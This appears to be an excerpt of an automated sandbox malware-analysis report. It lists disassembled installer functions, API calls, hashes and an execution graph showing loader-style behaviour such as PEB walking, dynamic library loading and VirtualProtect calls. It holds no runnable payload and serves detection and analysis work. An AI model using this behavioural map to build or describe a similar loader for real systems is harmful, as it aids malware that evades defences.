                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902
                                                                                              • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1599320355-0
                                                                                              • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                              • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                              • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                              • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                              Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                              • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                              • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                              • String ID: Version
                                                                                              • API String ID: 512980652-315105994
                                                                                              • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                              • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                              • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                              • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                              Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                              • GetTickCount.KERNEL32 ref: 00403303
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                              • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                              • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                              • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                              Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                              • String ID:
                                                                                              • API String ID: 2883127279-0
                                                                                              • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                              • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                              • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                              • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                              Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                              • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                              • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                              • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                              Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringlstrcmp
                                                                                              • String ID: !N~
                                                                                              • API String ID: 623250636-529124213
                                                                                              • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                              • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                              • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                              • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                              Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 00405C74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: Error launching installer
                                                                                              • API String ID: 3712363035-66219284
                                                                                              • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                              • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                              • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                              • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                              Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                              • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandlelstrlenwvsprintf
                                                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                              • API String ID: 3509786178-2769509956
                                                                                              • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                              • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                              • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                              • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                              Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                              • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                              • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                              • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                              • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                              • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                              Execution Graph

                                                                                              Execution Coverage:29.6%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:5.6%
                                                                                              Total number of Nodes:143
                                                                                              Total number of Limit Nodes:7
                                                                                              execution_graph 1271 5296f9 1274 528a99 1271->1274 1275 528b02 1274->1275 1331 527a49 1275->1331 1277 528b37 1278 527a49 GetPEB 1277->1278 1279 528b4e 1278->1279 1334 528319 1279->1334 1281 528dc6 1337 527569 1281->1337 1283 528de3 1340 527889 1283->1340 1285 528e00 1286 528319 GlobalAlloc 1285->1286 1287 528f08 1286->1287 1344 5274f9 1287->1344 1289 528f25 1290 527889 2 API calls 1289->1290 1291 528f38 1290->1291 1347 528379 1291->1347 1293 528fb0 1354 5275e9 1293->1354 1295 52908c 1357 527c59 CreateFileW 1295->1357 1297 5290ae 1363 528579 1297->1363 1299 5290ee 1300 5291a8 1299->1300 1301 5291fc 1299->1301 1367 528729 1300->1367 1303 529234 1301->1303 1304 529204 1301->1304 1305 528319 GlobalAlloc 1303->1305 1373 5276f9 1304->1373 1309 529241 1305->1309 1306 5291f4 1310 5294c4 1306->1310 1312 529513 1306->1312 1396 526ee9 1306->1396 1311 528319 GlobalAlloc 1309->1311 1313 5292bf 1311->1313 1312->1310 1314 528319 GlobalAlloc 1312->1314 1377 527639 1313->1377 1316 5295c0 1314->1316 1318 527889 2 API calls 1316->1318 1317 529311 1320 528319 GlobalAlloc 1317->1320 1323 529429 1317->1323 1319 5295f7 1318->1319 1322 528319 GlobalAlloc 1319->1322 1329 52936c 1320->1329 1324 529634 1322->1324 1323->1306 1392 526ce9 1323->1392 1325 529651 VirtualProtect 1324->1325 1371 527c09 1325->1371 1329->1323 1382 527039 1329->1382 1385 528859 1329->1385 1399 528a49 GetPEB 1331->1399 1333 527a69 1333->1277 1335 528335 GlobalAlloc 1334->1335 1336 528329 1334->1336 1335->1281 1336->1335 1338 528319 GlobalAlloc 1337->1338 1339 527578 1338->1339 1339->1283 1341 528319 GlobalAlloc 1340->1341 1342 52789a 1341->1342 1343 5278ad LoadLibraryW 1342->1343 1343->1285 1345 528319 GlobalAlloc 1344->1345 1346 527508 1345->1346 1346->1289 1349 52838e 1347->1349 1348 528319 GlobalAlloc 1348->1349 1349->1348 1350 5283c6 NtQuerySystemInformation 1349->1350 1353 5283b4 1349->1353 1350->1349 1351 5283f2 1350->1351 1352 528319 GlobalAlloc 1351->1352 1352->1353 1353->1293 1355 528319 GlobalAlloc 1354->1355 1356 5275f7 1355->1356 1356->1295 1358 527c8d 1357->1358 1359 527c86 1357->1359 1358->1359 1360 528319 GlobalAlloc 1358->1360 1359->1297 1361 527cc9 ReadFile 1360->1361 1361->1359 1362 527d04 CloseHandle 1361->1362 1362->1359 1364 52858a 1363->1364 1365 527889 2 API calls 1364->1365 1366 52865f 1365->1366 1366->1299 1368 52874c 1367->1368 1369 5287e1 1368->1369 1370 528859 4 API calls 1368->1370 1369->1306 1370->1368 1372 527c15 VirtualProtect 1371->1372 1372->1310 1374 52771c 1373->1374 1375 526ce9 GlobalAlloc 1374->1375 1376 52776a 1374->1376 1375->1374 1376->1306 1378 528319 GlobalAlloc 1377->1378 1379 52764a 1378->1379 1380 528319 GlobalAlloc 1379->1380 1381 52766c 1380->1381 1381->1317 1400 527289 1382->1400 1384 52707e 1384->1329 1386 527639 GlobalAlloc 1385->1386 1387 528868 1386->1387 1406 528249 CreateFileW 1387->1406 1390 52888d 1390->1329 1393 526d1a 1392->1393 1394 526d13 1392->1394 1393->1394 1395 528319 GlobalAlloc 1393->1395 1394->1306 1395->1393 1397 528319 GlobalAlloc 1396->1397 1398 526efc 1397->1398 1398->1312 1399->1333 1402 527298 1400->1402 1401 5272a4 1401->1384 1402->1401 1403 528319 GlobalAlloc 1402->1403 1404 52738f 1403->1404 1405 528319 GlobalAlloc 1404->1405 1405->1401 1407 52827a WriteFile 1406->1407 1408 528276 1406->1408 1407->1408 1408->1390 1409 5298a9 1408->1409 1410 5298ba 1409->1410 1411 52994d malloc 1410->1411 1412 5298f9 1410->1412 1411->1412 1412->1390 1432 5277a9 1437 526ff9 1432->1437 1434 5277c1 1435 527c59 4 API calls 1434->1435 1436 5277e9 1435->1436 1438 528319 GlobalAlloc 1437->1438 1439 527007 1438->1439 1439->1434 1413 52942f 1420 52937f 1413->1420 1414 529429 1416 5294ba 1414->1416 1417 526ce9 GlobalAlloc 1414->1417 1415 527039 GlobalAlloc 1415->1420 1418 526ee9 GlobalAlloc 1416->1418 1419 5294c4 1416->1419 1421 529513 1416->1421 1417->1416 1418->1421 1420->1414 1420->1415 1422 528859 4 API calls 1420->1422 1421->1419 1423 528319 GlobalAlloc 1421->1423 1422->1420 1424 5295c0 1423->1424 1425 527889 2 API calls 1424->1425 1426 5295f7 1425->1426 1427 528319 GlobalAlloc 1426->1427 1428 529634 1427->1428 1429 529651 VirtualProtect 1428->1429 1430 527c09 1429->1430 1431 52968e VirtualProtect 1430->1431 1431->1419

                                                                                              Executed Functions

                                                                                              Function 00528379 Relevance: 1.6, APIs: 1, Instructions: 123nativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 217 528379-528387 218 52838e-528395 217->218 219 5284e0-5284e4 218->219 220 52839b-5283b2 call 528319 218->220 223 5283b4 220->223 224 5283b9-5283e6 call 527d89 NtQuerySystemInformation 220->224 223->219 227 5283f2-52840f call 528319 224->227 228 5283e8-5283f0 224->228 231 528412-528418 227->231 228->218 232 5284d9 231->232 233 52841e-528425 231->233 232->219 234 52842b-52844b call 527d89 233->234 235 5284c9-5284d4 233->235 238 528456-52845c 234->238 235->231 239 528482-5284ae call 528149 call 5279c9 238->239 240 52845e-52846a 238->240 247 5284b0-5284b6 239->247 248 5284b8-5284c1 239->248 240->239 241 52846c-528480 240->241 241->238 247->235 248->235 249 5284c3-5284c6 248->249 249->235
                                                                                              APIs
                                                                                                • Part of subcall function 00528319: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00528349
                                                                                              • NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 005283DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000002F.00000002.3155031336.0000000000526000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00526000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_47_2_526000_ulu_mon.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocGlobalInformationQuerySystem
                                                                                              • String ID:
                                                                                              • API String ID: 3737350999-0
                                                                                              • Opcode ID: 4b7043f871755b58f40638a0e80aec111520236eadfc74e0803d840394cff95c
                                                                                              • Instruction ID: 1a9ed36a2184200b2c4207809de51dd63383ef11e438511f25976d68c2c4c44c
                                                                                              • Opcode Fuzzy Hash: 4b7043f871755b58f40638a0e80aec111520236eadfc74e0803d840394cff95c
                                                                                              • Instruction Fuzzy Hash: B4510875D0121AEBCF04DFD8D880ABEBBB5BF49304F148559E815A7380DB75AA40CBA0
                                                                                              Function 00527C59 Relevance: 4.6, APIs: 3, Instructions: 79fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 00527C7B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000002F.00000002.3155031336.0000000000526000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00526000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_47_2_526000_ulu_mon.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 811ed88586e1a9313cd571564231c22e97687d35a065f62fc27905b3f91c6921
                                                                                              • Instruction ID: 61256ca83d350627b7da30d65cf3cef906444f5c9718b47c469a59aa684491b7
                                                                                              • Opcode Fuzzy Hash: 811ed88586e1a9313cd571564231c22e97687d35a065f62fc27905b3f91c6921
                                                                                              • Instruction Fuzzy Hash: 4031EF75A04108FFCB04DF98D891F9EB7B5FF89310F208598E914AB391D631AE41DB54
                                                                                              Function 00528A99 Relevance: 4.0, APIs: 2, Instructions: 995memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
